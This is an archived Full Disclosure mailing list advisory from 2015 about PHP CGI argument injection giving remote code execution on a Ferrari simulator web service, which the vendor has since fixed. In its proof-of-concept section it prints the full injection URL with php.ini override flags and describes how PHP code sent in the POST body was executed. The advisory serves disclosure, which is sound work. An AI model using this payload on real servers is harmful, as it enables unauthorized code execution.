[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Ferrari - PHP CGI Argument Injection (RCE) Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2015-08-07 17:23:11
Message-ID: 55C4E97F.7020705 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Ferrari - PHP CGI Argument Injection (RCE) Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1562
Video: http://www.vulnerability-lab.com/get_content.php?id=1561
Vulnerability Magazine: \
http://magazine.vulnerability-db.com/?q=articles/2015/08/07/ferraricom-simulationcenter-remote-code-execution-php-cgi-argument-injection
Release Date:
=============
2015-08-07
Vulnerability Laboratory ID (VL-ID):
====================================
1562
Common Vulnerability Scoring System:
====================================
9.2
Product & Service Introduction:
===============================
Users can choose from one in five different circuits (Monza, Imola, Mugello, Silverstone and \
Nürburgring), while HD screens literally wrap 180 degrees around them, delivering \
ultra-realistic graphics to boot. The experience perfectly illustrates the concept of the new \
Ferrari Store, which was opened just two months ago and was conceived not merely as a shopping \
destination but also as an entertainment venue. With four F1 simulators, interactive video \
walls and numerous multisensory positions, the new 750 square meter space treats visitors to a \
completely immersive experience of the Ferrari legend.
(Copy of the Vendor Homepage http://auto.ferrari.com/en_EN/news-events/ )
Abstract Advisory Information:
==============================
An indepndent vulnerability laboratory researcher discovered a remote code execution \
vulnerability in the official ferrari online service web-application.
Vulnerability Disclosure Timeline:
==================================
2015-08-07: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Ferrari
Product: Simulator - Online Service (Web-Application) 2015 Q3
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection \
vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve \
code execution. From the advisory: ``if there is NO unescaped `=` in the query string, the \
string is split on `+` (encoded space) characters, urldecoded, passed to a function that \
escapes shell metacharacters (the ``encoded in a system-defined manner`` from the RFC) and \
then passes them to the CGI binary.`` This module can also be used to exploit the plesk 0day \
disclosed by kingcope and exploited in the wild on June 2013. (Source: \
http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection)
Proof of Concept (PoC):
=======================
The remote code execution vulnerability can be exploited by remote attackers without privilege \
application user account or user interaction. For security demonstration or to reproduce follow \
the provided information and steps below to continue.
How I found the vulnerability: As part of any penetration test, fingerprinting is one of the \
first steps. After sending a request to their servers, I noticed they used PHP/5.3.12 which is \
known to be vulnerable to a Command execution vulnerability.
The Response:
HTTP/1.1 302 Found
Date: Wed, 16 Jun 2015 09:16:13 GMT
Server: Apache
Location: /book/
X-Powered-By: PHP/5.3.12
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
I started testing for this vulnerability manually and noticed code execution could be \
performed. When makeing a POST request to:
http://simulationcenter.ferrari.com/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+
open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
I noticed an error.
http://i.imgur.com/lFPgpyn.png
When sending some PHP script along with the POST request I noticed the script was executed. I \
sent this script: <?php echo(md5(kieran)); ?> and the right hash was returned.
I then did some automated testing with a metasploit script and this also gave positive results.
The exploit script can be found here: \
http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection
The POC with both manual and automated exploitation can be found here: \
hhttps://www.youtube.com/watch?v=vv7SMWC08eI
Solution - Fix & Patch:
=======================
2015-08-05 (fixed by ferrari)
Security Risk:
==============
The security risk of code execution web vulnerability in the ferrari simulator online service \
is estimated as critical. (CVSS 9.2)
Credits & Authors:
==================
Kieran Claessens (www.kieranclaessens.be)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic